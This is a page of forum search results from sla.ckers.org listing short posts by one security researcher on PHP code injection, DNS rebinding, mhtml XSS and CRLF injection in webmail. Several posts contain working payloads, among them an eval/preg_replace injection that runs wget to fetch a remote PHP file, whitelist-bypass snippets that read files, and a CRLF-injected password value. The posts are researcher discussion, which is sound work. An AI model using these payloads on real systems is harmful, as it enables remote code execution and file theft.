Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 

Pages: 1234Next
Current Page: 1 of 4
Results 1 - 30 of 95
6 years ago
lpilorz
And what you meant would rather look like: http://www.securityfocus.com/archive/1/448007/100/0/threaded
Forum: Projects
6 years ago
lpilorz
It tries to upload your php file to attacked server. I think this advisory explains it best: http://www.hardened-php.net/advisory_042006.119.html This vector is useful against preg_replace and sometimes eval (bugs like: <?php eval('$var="'.addslashes($_GET['var']).'";'); ?>). Simply: {${function()}} substites ".function()." `` substitutes shell_exec()
Forum: Projects
6 years ago
lpilorz
http://demo.php-ids.org/?test=/etc/passwd is taken as alphanumeric, so signature is not matched hxxp://demo.php-ids.org/?test=skipcentrifuge {${`wget hxxp://example.com/x.php`}} my favourite eval/preg_replace exploit edit: removing second link, was broken by forum
Forum: Projects
5 years ago
lpilorz
Finally I'll meet some sla.ckers ;)
Forum: OMG Ponies
6 years ago
lpilorz
It was mentioned on ha.ckers.org two years ago, but to tell the truth, I assumed it's not worth it for the spammer - 5 minutes of patching and the whole "campaign" is broken. I was far from being right ;) There are "top PR" sites with known vulns still unpatched for more than a year...
Forum: XSS Info
6 years ago
lpilorz
Hi, did you notice XSS vulns on high-PR sites from xssed.com are used for spamming and positioning porn sites? All the XSS vulns that I've seen used for it are also present on xssed.com. I don't think this is a coincidence. This method is rather nothing new, but I haven't seen it before on such scale it's happening last weeks. Spammer's script basically tries to inject link to hxxp://?param
Forum: XSS Info
6 years ago
lpilorz
I just tested Google Chrome with this demo, and of course it's also vulnerable. In a real world attack, there would be no need for email (data that is sent by email could be stored in a cookie for example) - you should only make sure that the victim returns to your site (or any site that has your iframe) after some time.
Forum: Projects
6 years ago
lpilorz
http://lukasz.pilorz.net/dnsr/ - tested and working in FF3/IE7. This attack scenario is much less dangerous compared to what we could do a year ago.
Forum: Projects
6 years ago
lpilorz
If you can convince user to stay or your site longer than whatever the timeout limit is now (long live web video!), or return to it after some time (even after closing browser, as long as cache is not cleaned), then probably yes, but I didn't check for sime time. I'll try to put some more general demo online, if time permits.
Forum: Projects
6 years ago
lpilorz
Two more ;) cpreg_replace(' /x/e ','readfile("phpwhitelist.php")','x'); $x="_SERVER"; var_dump($$x);
Forum: Projects
6 years ago
lpilorz
<?php $strpos="readfile"; ${strpos}("phpwhitelist.php") ?>
Forum: Projects
6 years ago
lpilorz
It's worse than that. Recently I've been spammed with proposition of playing an online game where players compete who is faster in writing words from images. The funny thing is the game is paid. So people are actually paying to download the client and solve hunderds of CAPTCHAs for someone... ;) Screenshot from the game site: http://szybkitomek.pl/gfx/screenshot_full.jpg
Forum: SPAM
6 years ago
lpilorz
I believe 1 and 3 do not allow code execution (you need partial control or backreference in second parameter). The exploit for 2nd assumes register_globals=on, knowing this you should be able to change it into universal one.
Forum: SQL and Code Injection
6 years ago
lpilorz
I'm still sure it's Acunetix - if you download free edition you should find this value hardcoded in one of the DLLs.
Forum: XSS Info
6 years ago
lpilorz
I would say it's Acunetix WVS: http://www.google.com/search?q=111-222-1933email%40address.tst+acunetix but maybe AppScan uses this value too.
Forum: XSS Info
6 years ago
lpilorz
I already found out, the only thing I could do is local network portscanning. I tries using webmail to connect to other ports from it's server and simulating some other protocol using CRLF injection (could give access to local resources), but POP3 is not good for it. I though maybe someone had already played with such things and could give some ideas for using CRLF injection in POP3. The Perl s
Forum: Networking
6 years ago
lpilorz
It usually has the possibility to add an external pop3 account settings (host, username, password) and retrieve all contents at once. There is no option to RETR single entries. So I set host:port, user, pass, click OK, click "Import", and the server does: user <my_input_here> pass <my_input_here> stat list retr 1 retr 2 ... quit If the POP3 server replies with an
Forum: Networking
6 years ago
lpilorz
18. POP3
In some webmails there is an option to retrieve messages from external POP3 server. I found out some of them allow: - connecting to internal network host of the company (by IP or hostname) - selecting any port - CRLF injection, like setting password to "secret\r\nquit" (but not CSRF-able) Do you have some ideas for exploiting them? I thought of retrieving some local web content, but
Forum: Networking
6 years ago
lpilorz
I rather meant crawler configuration, to save time in case example.com/X.html is rewritten into example.com/script.php?var=X For an application with lot of rewriting it's a must-have scanner feature, otherwise there will be millions of URL to crawl.
Forum: Projects
6 years ago
lpilorz
To tell the truth I did not go into details with what was changed, but with the latest Java update both Kanatoko's demos (Java & LiveConnect) stopped working for me. The code I based on his presentation also started throwing Java privileges exception. "Sun has included changes that perform additional hostname matching using DNS reverse mapping data to mitigate these issues." - htt
Forum: Projects
6 years ago
lpilorz
Btw, dnsrebinding.securityexploits.com is a no-ip.com wildcard domain. That's the reason for such long timing (60 seconds to wait for no-ip.com DNS change), and it won't work for more than one victim at the same time. LiveConnect is fixed, so there is no reason to run it anyway.
Forum: Projects
6 years ago
lpilorz
Hi, are you planning to add mod_rewrite support for w3af in the future?
Forum: Projects
6 years ago
lpilorz
Hi, can anyone sum up what's the current state of DNS rebinding attack vectors? AFAIK, LiveConnect & Flash are fixed. Are there any others left, and what are the timing requirements? Btw, this no longer works so I can post it: http://lukasz.pilorz.net/testy/dnsrebinding/scanner.phps http://lukasz.pilorz.net/testy/dnsrebinding/phpmyadmin_exec.phps Sample LiveConnect DNS rebinding atta
Forum: Projects
7 years ago
lpilorz
Unfortunately I cannot find any real-world application example, where Pixy gives any results other than false positives, "not found includes" or "out of memory" error :) Any tips?
Forum: News and Links
7 years ago
lpilorz
lpilorz Wrote: ------------------------------------------------------- > It seems another use of mhtml bug was missed in > discussions here: > http://openmya.hacker.jp/hasegawa/security/ms07-03 > 4.txt > > By the way, if mhtml is fixed, then I think it > will do no harm if I share my sample: I didn't make it clear - the sample in my first post was another sample of
Forum: News and Links
7 years ago
lpilorz
In case of mhtml-XSS there is no need for redirect. I still have some problems with making it work in the real world, but a simple example is here: http://lukasz.pilorz.net/testy/mhtml/mhtml_xss.phps It is exploited like typical XSS - e.g. with: iframe src="mhtml:hxxp://lukasz.pilorz.net/testy/mhtml/mhtml_xss.php?x=" Classical XSS would not work, because the script escapes all ou
Forum: News and Links
7 years ago
lpilorz
lpilorz Wrote: ------------------------------------------------------- > It seems another use of mhtml bug was missed in > discussions here: > http://openmya.hacker.jp/hasegawa/security/ms07-03 > 4.txt And the funny part of it - if a site used removing empty lines to protect against mhtml-redirect, it was more likely vulnerable to mhtml-XSS than a site with double line breaks i
Forum: News and Links
7 years ago
lpilorz
It seems another use of mhtml bug was missed in discussions here: http://openmya.hacker.jp/hasegawa/security/ms07-034.txt By the way, if mhtml is fixed, then I think it will do no harm if I share my sample: http://lukasz.pilorz.net/testy/mhtml/index.phps http://lukasz.pilorz.net/testy/mhtml/mhtml_js.phps It's nothing new - the script reads values of some input fields from given page, and
Forum: News and Links
7 years ago
lpilorz
When I tested it over a month ago (April, 12) it seemed to be fixed. Regression?
Forum: XSS Info
7 years ago
lpilorz
Maybe someone will find it useful - these Unicode chars may be converted to special chars (<,>,',"): http://lukasz.pilorz.net/testy/unicode_conversion/ The first two are the most interesting, because they exist in ISO-8859-1, but no other popular single-byte encoding.
Forum: News and Links
Pages: 1234Next
Current Page: 1 of 4